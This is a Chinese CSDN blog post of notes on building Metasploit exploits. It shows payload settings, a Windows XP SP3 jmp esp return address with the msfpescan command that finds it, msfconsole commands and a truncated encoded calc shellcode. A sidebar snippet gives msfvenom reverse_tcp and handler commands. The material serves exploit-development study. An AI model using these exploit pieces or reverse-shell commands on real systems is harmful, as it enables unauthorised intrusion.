Metasploit使用问题记录及攻击测试代码

最新推荐文章于 2023-06-23 15:35:13 发布
最新推荐文章于 2023-06-23 15:35:13 发布
阅读量1.3w 收藏 1
点赞数
分类专栏: Network Security 文章标签: 测试 stream server socket struct buffer
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jiayanhui2877/article/details/7968170
版权
本文记录了使用Metasploit过程中遇到的问题,包括Payload Space不足的解决方法,Metasploit模块加载失败的语法调整,Windows XP SP3的exploit调整以及Metasploit常用命令的介绍。此外,还展示了一段223字节的shellcode代码示例。
摘要由CSDN通过智能技术生成

1、利用failwest书中的例子进行测试,执行exploit后提示如下信息,说明 Payload'中的Space过小,增大即可,后面有例子程序可进行测试。

'Payload'        =>
                {
                    'Space'    => 300,
                    'BadChars' => "\x00",
                    'StackAdjustment' => -3500,
                },
[-] Exploit failed: No encoders encoded the buffer successfully.
 [*] Exploit completed, but no session was created.

2、如提示无法加载模块,说明rb文件书写语法有误,需要更改,不同的版本有可能语法也不完全相同,如下面的rb测试代码放到最新的版本中则无法加载,使用时注意。

3、目前使用metasploit3.4.0版本进行测试,测试时发现targets 中sp2及win 2000地址失效,所以用[ 'Windwos xp sp3',    { 'Ret' => 0x7c86467b} ], ,0x7c86467b地址为jmp esp测试成功,使用metasploit console输入 msfpescan -f -j esp c:/windows/system32/kernel32.dll

4、metasploit常用命令:

use 模块名

set payload XX

set rhost XX

set rport XX

set exitfunc seh

set cmd calc

set payload windows/exc

5、配置的shellcode为223个字节,即上面的300可以改为223

/*
 * windows/exec - 223 bytes
 * http://www.metasploit.com
 * Encoder: x86/shikata_ga_nai
 * EXITFUNC=process, CMD=calc
 */
unsigned char buf[] =
"\xd9\xe5\xbd\x20\x99\xb8\x99\x31\xc9\xd9\x74\x24\xf4\x5e\xb1"
"\x32\x83\xee\xfc\x31\x6e\x13\x03\x4e\x8a\x5a\x6c\x

最低0.47元/天 解锁文章
Walter_Jia
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
exploit已完成,但没有创建会话exploit completed, but no session was created
08-22 1万+
The "no session was created" message occurs if one of the following happens: 1) The exploit you use doesn't work against the target you selected. Could be the exploit is for a different ve...
exploit completed, but no session was created
gRpc的博客
08-24 3792
metasploit
使用Kali Linux Metasploit复现永恒之蓝
xujing19920814的博客
10-01 5566
使用Kali Linux Metasploit复现永恒之蓝
Metasploit 魔鬼训练营》05 网络服务渗透攻击
kevinhanser
11-07 4389
本文记录 Kali Linux 2017.1 学习使用 Metasploit 的详细过程 1. 内存攻防技术 2. MS08-067 攻击案例 3. Oricle 数据库 4. KingView 6.53 HistorySrv 渗透攻击 5. Samba 安全漏洞
ms08-067漏洞的复现及所遇到的问题分析
ianTok
10-12 4812
ms08-067
利用metasploit对操作系统攻击
2201_76106464的博客
06-23 159
网络安全离不开操作系统,操作系统对网络安全有着非常重要的影响,许多网络攻击都是从寻找系统的缺陷入手的。在漏洞、攻击发生时,尽量避免使用发生漏洞的操作系统,或者根据漏洞补救方法对自己电脑的操作系统进行修复,尽量避免在漏洞未修复时登录个人隐私性账户;重要数据一定要定期做好备份,一天一备或一小时一备,最好做到异地备份,不要备份在同一台服务器上,万一数据被删除或被入侵挟持,备份在异地的数据能保证安全;除了重视被漏洞入侵的危害,还要防范恶意攻击,选择高防服务器。
metasploit实验报告及漏洞利用代码
01-11
Metasploit是一款强大的安全渗透测试工具,主要用于模拟攻击和检测系统漏洞。它是开源社区的瑰宝,由 Rapid7 维护,并且在全球范围内被安全研究人员、渗透测试人员以及网络安全专业人员广泛使用。本实验报告将深入...
【网络安全】Metasploit渗透与攻击测试框架
weixin_46596227的博客
03-27 337
Metasploit是一个广泛使用的渗透测试工具,由 Rapid7 公司开发并维护。它是一个开源的框架,允许安全专业人员测试和评估网络上的漏洞和安全弱点。Metasploit有一个巨大的漏洞数据库,包含各种操作系统、服务和应用程序的漏洞。Metasploit 有一个强大的命令行界面,也有一个交互式图形用户界面,称为Armitage。它可以使用漏洞利用模块,自动化渗透测试过程,并对受攻击的系统进行远程控制。它还提供了一些辅助工具,如密码破解器、端口扫描器、漏洞扫描器等。
MetaSploit终端下PostgreSQL数据库的使用.rar
最新发布
12-29
在IT安全领域,渗透测试是评估系统安全性的重要手段,而MetaSploit是一个广泛使用的开源渗透测试框架。这个压缩包文件“MetaSploit终端下PostgreSQL数据库的使用.rar”显然是关于如何在MetaSploit环境中操作和利用...
Metasploit 渗透测试框架的基本使用(扩展:利用永恒之蓝漏洞攻击WIN7靶机)
weixin_46035615的博客
04-14 4743
1.Metasploit 渗透测试框架介绍 2.Metasploitable2-Linux 靶机系统介绍 3.Metasploit 基本使用方法 4.实战-使用 msf 渗透攻击 Win7 主机并远程执行命令 5.实战-使用 msf 扫描靶机上 mysql 服务的空密码
Windows远程桌面服务漏洞(CVE-2019-0708)复现测试
四维创智
09-19 6554
1、漏洞概述 2019年5月14日,微软发布了针对远程桌面服务的关键远程执行代码漏洞CVE-2019-0708的补丁,该漏洞影响某些旧版本的Windows。攻击者一旦成功触发该漏洞,便可以在目标系统上执行任意代码,该漏洞的触发无需任何用户交互操作。这就意味着,存在漏洞的计算机只要联网,无需任何操作,就可能遭遇黑客远程攻击,运行恶意代码。其方式与2017年WannaCry恶意软件的传播方式类似。成...
MSF使用总结
qq_44657899的博客
09-25 4392
文章目录生成小马文件运行小马维持会话 生成小马文件 msfvenom -p windows/meterpreter/reverse_tcp LHOST=服务器IP LPORT=服务器监听端口 -f exe -o test.exe 生成的小马在root目录下 运行小马 // 进入msf msfconsole // 监听 use exploit/multi/handler // 设置payload set payload windows/meterpreter/reverse_tcp // 设置 s
组策略错误没有权限执行此操作_Metasploit PSExec执行报错大全
weixin_39915815的博客
11-22 4395
声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。所有话题标签:#Web安全 #漏洞复现 #工具使用 #权限提升#权限维持#防护绕过#内网安全 #实战案例#其他笔记 #资源分享 ...
0day 安全之 msf 初探
qq_41071646的博客
08-14 213
msf 这个工具 在我还没有开始学pwn 就有搞web的人 说过这个框架 只是没有怎么了解 没有想到这个工具 竟然使用Ruby 写的,, 社会 社会,。 然后这里 关于在 windows下的安装 我就不说了 反正 都一样(直接用kail的就行) 不过 有一点 感觉很坑 就是 版本不一样 然后 导致我们写的 exploit 可能会加载失败,,(可能是) 这里我也不太确定,因为我也不太...
Metasploit系列----模块详解
bronze_s的博客
04-25 1387
kali linux中默认集成了metasploit Framework社区版本,是精简后的免费版本。使用者多为安全研究人员或学生。 metasploit中的模块分类 exploit(渗透模块): 是一段程序,运行时会利用目标的安全漏洞进行安全测试。 payload(安全测试载荷模块): 在成功对目标完成一次渗透测试,payload将在目标机器运行,帮助我们获取目标上需要的访问和运行权限。 auxiliary(辅助模块): 包含扫描、fuzz测试、漏洞挖掘、网络协议欺骗等程序。 encoder(编码器模
Metasploit 魔鬼训练营》06 客户端渗透攻击
kevinhanser
11-07 2416
本文记录 Kali Linux 2017.1 学习使用 Metasploit 的详细过程 1. MSF 中自动化浏览器攻击 2. MS11-050 安全漏洞 3. KingView 渗透攻击过程 4.MS10-087 安全漏洞 5. Adoba阅读器渗透攻击案例 1.MSF 中自动化浏览器攻击msf auxiliary(browser_autopwn2) >
Metasploit渗透测试工具详解
Metasploit是一个开源的安全漏洞检测和利用工具套件,广泛应用于渗透测试、安全研究以及漏洞开发领域。这个工具包提供了大量的预构建的exploits(攻击代码),能够帮助网络安全专业人员模拟攻击,评估系统安全,并...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值